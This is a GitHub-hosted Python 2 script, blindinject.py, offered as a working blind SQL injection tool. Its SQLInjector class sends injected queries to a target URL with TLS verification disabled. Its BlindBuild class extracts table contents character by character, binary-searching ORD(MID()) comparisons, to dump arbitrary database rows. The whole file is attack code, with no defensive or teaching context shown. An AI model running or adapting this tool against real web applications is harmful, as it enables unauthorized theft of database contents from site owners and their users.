-
Notifications
You must be signed in to change notification settings - Fork 0
/
blindinject.py
141 lines (98 loc) · 2.8 KB
/
blindinject.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
#!/usr/bin/python
import urllib,urllib2
import sys
import time, ssl
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
class BlindBuild:
def __init__(self, sqlInjector, nbFields, database, table, fieldList, addWhere = '1', pg=False):
self.sqlInjector = sqlInjector
self.__select = ','.join(['1']*nbFields)
self.__db = database
self.__table = table
self.__fields = fieldList
self.__addWhere = addWhere
self.__progress = pg
'''
SELECT __select FROM (SELECT __field FROM __db.__table LIMIT __x, 1) AS res WHERE ORD(MID(res.__field, __n, 1)) = __a
'''
'''
Creates an empty line of result
'''
def __createResult(self):
res = dict()
for f in self.__fields:
res[f] = ''
return res
'''
Runs the blind injection
'''
def run(self):
x = 0
dump = []
not_end = True
while not_end:
line = self.__createResult()
for field in self.__fields:
n = 1
fieldRes = ''
while True:
found = 0
bmin=0
bmax=256
hasResult = False
query = 'SELECT %s FROM (SELECT %s FROM %s.%s WHERE %s LIMIT %d,1) AS res WHERE 1' % (self.__select, field, self.__db, self.__table, self.__addWhere, x)
if not self.sqlInjector.hasReturnedResult(self.sqlInjector.query(query)):
not_end = False
break
while (bmax-bmin)!=1:
a = (bmin+bmax)/2
val = 'ORD(MID(res.%s, %d, 1))' % (field, n)
query = 'SELECT %s FROM (SELECT %s FROM %s.%s WHERE %s LIMIT %d,1) AS res WHERE %s>=%d AND %s<%d' % (self.__select, field, self.__db, self.__table, self.__addWhere, x, val, bmin, val, a)
res = self.sqlInjector.query(query)
hasResult = self.sqlInjector.hasReturnedResult(res)
if hasResult:
bmax = a
else:
bmin = a
c = bmin
if c==0:
break
else:
fieldRes += chr(c)
n += 1
if not not_end:
break
line[field] = fieldRes
if not_end:
if self.__progress:
sys.stdout.write('*')
sys.stdout.flush()
dump.append(line)
x += 1
if self.__progress:
print ''
return dump
def simpleCallback(v):
return v
class SQLInjector:
def __init__(self, urlStart, queryStart, queryEnd, urlEnd, patternCallback, callback = simpleCallback, cookies = []):
self.__start = urlStart
self.__queryStart = queryStart
self.__queryEnd = queryEnd
self.__end = urlEnd
self.__cookies = cookies
self.__CB = callback
self.__patternCB = patternCallback
self.numreq = 0
def query(self, q, cheat=False):
url = self.__start + self.__CB(self.__queryStart + q + self.__queryEnd) + self.__end
self.numreq += 1
if url[:5].lower()=='https':
return urllib2.urlopen(url, context=ctx).read()
else:
return urllib2.urlopen(url).read()
def hasReturnedResult(self, res):
return self.__patternCB(res)
return